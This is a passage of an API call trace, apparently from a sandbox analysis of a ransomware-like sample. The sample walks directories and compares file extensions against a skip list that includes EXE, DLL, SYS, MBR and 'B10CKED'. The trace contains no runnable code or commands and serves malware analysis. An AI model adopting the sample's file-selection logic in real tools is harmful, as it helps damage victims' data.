cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, 
lpString2="XML", cchCount2=3) returned 1 [0108.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="XML", cchCount2=3) returned 2 [0108.399] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0 [0108.399] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0108.399] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.400] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.400] 
FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.400] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.400] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.400] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.400] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.400] CharUpperBuffW (in: lpsz="xml", cchLength=0x3 | out: lpsz="XML") returned 0x3 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.400] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="XML", cchCount2=3) 
returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="XML", cchCount2=3) returned 2 [0108.401] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.401] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", 
cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.401] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.401] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.402] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: 
lpFindFileData=0x12e908) returned 1 [0108.402] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.402] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.402] CharUpperBuffW (in: lpsz="xml", cchLength=0x3 | out: lpsz="XML") returned 0x3 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 
[0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", 
cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="XML", cchCount2=3) returned 2 [0108.403] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.403] CharUpperBuffW (in: lpsz="ico", cchLength=0x3 | out: lpsz="ICO") returned 0x3 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="ICO", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="ICO", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", 
cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="ICO", cchCount2=3) returned 1 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="ICO", cchCount2=3) returned 3 [0108.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="ICO", cchCount2=3) returned 2 [0108.403] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0108.403] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0108.403] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW 
(in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{E35BE42D-F742-4D96-A50A-1775FB1A7A42}\\") returned 0x56 [0108.403] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpFindFileData=0x12e908 | out: 
